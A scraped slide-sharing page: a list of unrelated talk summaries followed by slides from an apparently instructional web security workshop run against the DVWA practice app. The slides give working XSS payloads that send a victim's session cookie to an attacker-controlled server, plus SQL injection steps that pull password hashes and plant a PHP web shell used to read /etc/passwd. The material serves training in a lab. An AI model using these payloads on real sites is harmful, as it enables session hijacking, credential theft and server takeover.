It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
The document discusses security vulnerabilities found in the web interfaces of security gateways. The author details how they used automated scanners, manual testing with Burp, and SSH access to root to find over 35 exploits in various security gateway products since 2011. Common vulnerabilities included input validation issues, predictable URLs and parameters enabling CSRF, excessive privileges, and session management flaws. The author provides examples of compromising ClearOS and Websense gateways, and demonstrates OSRF through Proofpoint's email system. They conclude many techniques are older but there remains a knowledge gap between secure web and UI development.
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...Bert Blevins
Today’s digitally connected world presents a wide range of security challenges for enterprises. Insider security threats are particularly noteworthy because they have the potential to cause significant harm. Unlike external threats, insider risks originate from within the company, making them more subtle and challenging to identify. This blog aims to provide a comprehensive understanding of insider security threats, including their types, examples, effects, and mitigation techniques.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
Choose our Linux Web Hosting for a seamless and successful online presencerajancomputerfbd
Our Linux Web Hosting plans offer unbeatable performance, security, and scalability, ensuring your website runs smoothly and efficiently.
Visit- https://onliveserver.com/linux-web-hosting/
Best Practices for Effectively Running dbt in Airflow.pdfTatiana Al-Chueyr
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
Measuring the Impact of Network Latency at TwitterScyllaDB
Widya Salim and Victor Ma will outline the causal impact analysis, framework, and key learnings used to quantify the impact of reducing Twitter's network latency.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Quantum Communications Q&A with Gemini LLM. These are based on Shannon's Noisy channel Theorem and offers how the classical theory applies to the quantum world.
Comparison Table of DiskWarrior Alternatives.pdfAndrey Yasko
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Mitigating the Impact of State Management in Cloud Stream Processing SystemsScyllaDB
Stream processing is a crucial component of modern data infrastructure, but constructing an efficient and scalable stream processing system can be challenging. Decoupling compute and storage architecture has emerged as an effective solution to these challenges, but it can introduce high latency issues, especially when dealing with complex continuous queries that necessitate managing extra-large internal states.
In this talk, we focus on addressing the high latency issues associated with S3 storage in stream processing systems that employ a decoupled compute and storage architecture. We delve into the root causes of latency in this context and explore various techniques to minimize the impact of S3 latency on stream processing performance. Our proposed approach is to implement a tiered storage mechanism that leverages a blend of high-performance and low-cost storage tiers to reduce data movement between the compute and storage layers while maintaining efficient processing.
Throughout the talk, we will present experimental results that demonstrate the effectiveness of our approach in mitigating the impact of S3 latency on stream processing. By the end of the talk, attendees will have gained insights into how to optimize their stream processing systems for reduced latency and improved cost-efficiency.
7 Most Powerful Solar Storms in the History of Earth.pdfEnterprise Wired
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
Details of description part II: Describing images in practice - Tech Forum 2024BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and transcript: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
An invited talk given by Mark Billinghurst on Research Directions for Cross Reality Interfaces. This was given on July 2nd 2024 as part of the 2024 Summer School on Cross Reality in Hagenberg, Austria (July 1st - 7th)
Support en anglais diffusé lors de l'événement 100% IA organisé dans les locaux parisiens d'Iguane Solutions, le mardi 2 juillet 2024 :
- Présentation de notre plateforme IA plug and play : ses fonctionnalités avancées, telles que son interface utilisateur intuitive, son copilot puissant et des outils de monitoring performants.
- REX client : Cyril Janssens, CTO d’ easybourse, partage son expérience d’utilisation de notre plateforme IA plug & play.
Sustainability requires ingenuity and stewardship. Did you know Pigging Solutions pigging systems help you achieve your sustainable manufacturing goals AND provide rapid return on investment.
How? Our systems recover over 99% of product in transfer piping. Recovering trapped product from transfer lines that would otherwise become flush-waste, means you can increase batch yields and eliminate flush waste. From raw materials to finished product, if you can pump it, we can pig it.
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
15. Web Application (In)security
Information Gathering - Spider, Search Engines, Application Discovery
Configuration Management - HTTP Methods, Admin Interfaces, Forgotten Files
Business Logic - Bypassable Business Logic
Authentication - Use of Encryption, Brute Force, Bypass, CAPTCHA
Authorisation - Path Traversal, Privilege Escalation
Session Management - Cookies, Session Management, Session Fixation
Data Validation - XSS, SQLi, OS Commanding, HTTP Splitting, XML Injection
Denial of Service - SQL Wildcard, Locking Accounts, Storing too much data
Web Service - Testing WSDL, REST, SOAP
24. Cross Site Scripting (XSS)
Even the biggest and baddest get it wrong:
Google (biggest)
Yahoo
YouTube
Facebook (baddest)
MySpace
Microsoft
EBay
Twitter?!
The list goes on and on...
Source: http://www.xssed.com/pagerank
26. Cross Site Scripting (XSS)
<plaintext>
'';!--"<XSS>=&{()}
<script>alert(1)</script>
36. Creating a vulnerable site
Log in
Go to the DVWA Security menu on the left
Change the security level to low
Disable NoScript
38. Checking for HTML Injection
We are going to look for reflected XSS, start simple
Go to the XSS reflected page and enter the following
<b>test</b>ABC
40. Checking for Script Injection
Now we know we can inject HTML lets go for the
classic XSS attack. Enter
<script>alert('XSS')</script>
This is where most people stop
42. Lets see if we can see the cookie
See if we can see the session cookie
<script>alert(document.cookie)</script>
This is OUR cookie, not much use, yet
44. Requesting images
This is where you have to use your imagination. Lets
request an “image” from a remote server
<img src="http://localhost/cookie_steal_image.html" >
Normally you would use an IP from a machine you
control and not localhost but localhost will have to do
for now as we donʼt have network connections
46. Lets check the logs
Bring up a terminal and tail the Apache web logs
tail -f /opt/lampp/log/access.log
Look for the entry for cookie_steal_image.html
48. Whats happening?
We have just requested an image from a server we
control
If we can get a victim to trigger that XSS we will be
informed when they hit it if we are watching our apache
logs
50. Tying the two together
We can make a request to our server
We can access the cookie
Can we tie the two together and send the cookie to our
server?
Yes....
52. What we canʼt do
We canʼt do this
<img src=”http://localhost/steal_cookie_image.html?
document.cookie”>
Because this would request the literal string specified in
the quotes
54. Dynamically requesting images
So we have to dynamically create the image request
<script>document.write('<img src="http://localhost/
cookie_steal_image.html">')</script>
This will do the same as the original image request but
it is created through JavaScript
56. Dynamically requesting images
And JavaScript can access the cookie
<script>document.write('<img src="http://localhost/
cookie_steal_image.html?' + escape(document.cookie)
+ '>');</script>
The escape is needed to HTML encode the cookie.
This stops “bad” characters from breaking the image
request.
58. Now check your logs again
/cookie_steal_image.html?security%3Dlow%3B
%20PHPSESSID
%3D1h76ngv5le4i832a0ptu2s8ag1%3E%3Cpre%3E
%3C/pre%3E%3C/div%3E%3Ch2%3EMore%20info
%3C/h2%3E%3Cul%3E%3Cli%3E%3Ca%20href=
Or
/cookie_steal_image.html? security=low;
%20PHPSESSID=225ejsvuc0uf5sjt9vpao2ovk3
60. Setting the cookie
You can now use Add ʻnʼ Edit cookies or Web
Developer Toolbar or all sorts of other tools to set that
cookie into your browser
Unfortunately DVWA Live CD doesnʼt have these
installed
62. How do we get the URL to the user?
So, we have generated this great attack, how do we get
it to the user?
Check the querystring, it should look something like
http://localhost/dvwa/vulnerabilities/xss_r/?
name=<script>document.write('<img+src%3D"http%3A
%2F%2Flocalhost%2Fcookie_steal_image.html%3F'+
%2B+escape(document.cookie)+%2B+'>')%3B<
%2Fscript>
You can think of ways to send this to victim
64. SQL Injection
$query = “SELECT * FROM users WHERE
username=ʻ$userʼ AND password=ʻ$passʼ ”;
$query = “SELECT * FROM users WHERE
username=ʻryanʼ AND password=ʻ123456ʼ ”;
66. SQL Injection
$query = “SELECT * FROM users WHERE
username=ʻʼʼ AND password=ʻ123456ʼ ”;
$query = “SELECT * FROM users WHERE
username=ʻadminʼ -- ʼ AND password=ʻ123456ʼ ”;
70. SQL Injection
SELECT first_name, last_name FROM users WHERE
user_id=ʻOʼMalleyʼ
You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version
for the right syntax to use near ʻʼ” at line 1
72. SQL Injection
SELECT first_name, last_name FROM users WHERE
user_id=ʻ1ʼ OR 1=1 #ʼ
ID: 1ʼ OR 1=1#
First name: admin
Surname: admin
ID: 1ʼ OR 1=1#
First name: Gordon
Surname: Brown
ID: 1ʼ OR 1=1#
First name: Hack
Surname: Me
ID: 1ʼ OR 1=1#
First name: Pablo
Surname: Picasso
ID: 1ʼ OR 1=1#
First name: bob
Surname: smith
74. SQL Injection
Find number of columns
SELECT first_name, last_name FROM users WHERE
user_id=ʻ1ʼ ORDER BY 1 #ʼ
76. SQL Injection
Find field names
SELECT first_name, last_name FROM users WHERE
user_id=ʻaʼ OR username = ʻadminʼ -- ʼ
Unknown column ʻusernameʼ in ʻwhere clauseʼ
78. SQL Injection
Find database name
SELECT first_name, last_name FROM users WHERE
user_id=ʻaʼ UNION SELECT null,database() # ʼ
ID: aʼ UNION SELECT null,database() #
First name:
Surname: dvwa
80. SQL Injection
Find table name
SELECT first_name, last_name FROM users WHERE
user_id=ʻaʼ UNION SELECT table_schema,
table_name FROM information_schema.tables WHERE
table_schema = ʻdvwaʼ #ʼ
ID: aʼ UNION SELECT table_schema...
First name: dvwa
Surname: guestbook
ID: aʼ UNION SELECT table_schema...
First name: dvwa
Surname: users
82. SQL Injection
Extract passwords
SELECT first_name, last_name FROM users WHERE
user_id=ʻaʼ UNION SELECT user,password FROM
users #ʼ
ID: aʼ UNION SELECT user,password FROM users #
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: aʼ UNION SELECT user,password FROM users #
First name: gordonb
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
84. SQL Injection
Create PHP backdoor
SELECT first_name, last_name FROM users WHERE
user_id=ʻaʼ UNION SELECT null,ʼ<?php
system($_GET[ʻcmdʼ]); ?>ʼ INTO OUTFILE ʻ/opt/
lampp/htdocs/hackable/uploads/shell.phpʼ #ʼ
http://127.0.0.1/hackable/uploads/shell.php?cmd=cat ../../../../../etc/passwd
http://127.0.0.1/hackable/uploads/shell.php?cmd=ifconfig
http://127.0.0.1/hackable/uploads/shell.php?cmd=ping 127.0.0.1 -c 3